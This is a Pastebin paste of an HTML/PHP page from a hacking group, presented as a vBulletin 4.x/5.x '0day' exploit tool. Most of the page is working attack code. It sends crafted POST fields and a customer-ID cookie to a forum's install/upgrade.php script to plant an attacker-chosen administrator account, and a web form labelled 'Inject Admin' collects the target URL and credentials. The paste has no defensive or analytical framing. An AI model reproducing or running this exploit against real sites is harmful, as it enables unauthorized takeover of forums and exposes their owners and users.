Advertisement
Guest User

Untitled

a guest
Sep 13th, 2013
3,324
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.79 KB | None | 0 0
  1. <html xmlns="http://www.w3.org/1999/xhtml"><head>
  2.  
  3.  
  4.  
  5.  
  6.  
  7. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  8.  
  9. <title>vBulletin 0day</title>
  10.  
  11. <style type="text/css">
  12.  
  13. <!--
  14.  
  15. body {
  16.  
  17. background-color: #000;
  18.  
  19. text-align: center;
  20.  
  21. color: #063;
  22.  
  23. font-size: large;
  24.  
  25. }
  26.  
  27. .a { font-size: 24px;
  28.  
  29. }
  30.  
  31. .f { color: #060;
  32.  
  33. }
  34.  
  35. .gbf { color: #F00;
  36.  
  37. }
  38.  
  39. .dd {
  40.  
  41. color: #F00;
  42.  
  43. }
  44.  
  45. .w {
  46.  
  47. font-size: large;
  48.  
  49. }
  50.  
  51. a:link {
  52.  
  53. text-decoration: none;
  54.  
  55. }
  56.  
  57. a:visited {
  58.  
  59. text-decoration: none;
  60.  
  61. }
  62.  
  63. a:hover {
  64.  
  65. text-decoration: none;
  66.  
  67. }
  68.  
  69. a:active {
  70.  
  71. text-decoration: none;
  72.  
  73. }
  74.  
  75. -->
  76.  
  77. </style></head><body>
  78.  
  79. <p class="a">
  80.  
  81.  
  82. <h1><span class="gbf">vBulletin</span> 4.x.x and 5.x.x Upgrade 0day Exploit</h1>
  83.  
  84. <br>Created by: 1337
  85. <br>Found on: 08/22/2013
  86. <br>Website: http://www.madleets.com
  87. </p>
  88.  
  89. <br>
  90. <?php
  91. //extract data from the post
  92. if(isset($_POST['submit'])){
  93. extract($_POST);
  94. //set POST variables
  95. $url = $_POST['url'];
  96. $fields = array(
  97. 'ajax' => urlencode('1'),
  98. 'version' => urlencode('install'),
  99. 'checktable' => urlencode('false'),
  100. 'firstrun' => urlencode('false'),
  101. 'step' => urlencode('7'),
  102. 'startat' => urlencode('0'),
  103. 'only' => urlencode('false'),
  104. 'customerid' => urlencode($_POST['customerid']),
  105. 'options[skiptemplatemerge]' => urlencode('0'),
  106. 'response' => urlencode('yes'),
  107. 'htmlsubmit' => urlencode('1'),
  108. 'htmldata[username]' => urlencode($_POST['username']),
  109. 'htmldata[password]' => urlencode($_POST['password']),
  110. 'htmldata[confirmpassword]' => urlencode($_POST['password']),
  111. 'htmldata[email]' => urlencode($_POST['email'])
  112. );
  113. //url-ify the data for the POST
  114. foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
  115. rtrim($fields_string, '&');
  116. //open connection
  117. $ch = curl_init();
  118. //set the url, number of POST vars, POST data
  119. curl_setopt($ch,CURLOPT_URL, $url);
  120. curl_setopt($ch,CURLOPT_POST, count($fields));
  121. curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
  122. curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
  123. curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );
  124. //execute post
  125. $result = curl_exec($ch);
  126. //close connection
  127. curl_close($ch);
  128. exit();
  129. }
  130. ?>
  131. <center>
  132. <form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>">
  133. <span>Example:http://test.com/forum/install/upgrade.php</span><br>
  134. <span>Website:</span>
  135. <input name="url" type="text" tabindex="1" size="60" />
  136. <br>
  137. <span>Customer ID:</span>
  138. <input name="customerid" type="text" tabindex="2" size="40" />
  139. <br>
  140. <span>Username:</span>
  141. <input name="username" type="text" tabindex="3" size="40" />
  142. <br>
  143. <span>Password:</span>
  144. <input name="password" type="text" tabindex="4" size="40" />
  145. <br>
  146. <span>Email:</span>
  147. <input name="email" type="text" tabindex="5" maxlength="40" />
  148.  
  149. <input name="submit" type="submit" value="Inject Admin">
  150. </form>
  151. </center>
  152.  
  153. <p class="a">------------------------------------------------------------------------------------------------------------------</p>
  154.  
  155. <p class="a">We are L33t Pakistani H4x0rZ | MaDLeeTs TeaM </p>
  156.  
  157. <p class="a">------------------------------------------------------------------------------------------------------------------</p>
  158.  
  159.  
  160. </div>
  161.  
  162. </pre>
  163.  
  164. <p class="a">&nbsp;</p>
  165. <p align="center">
  166.  
  167.  
  168. </body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement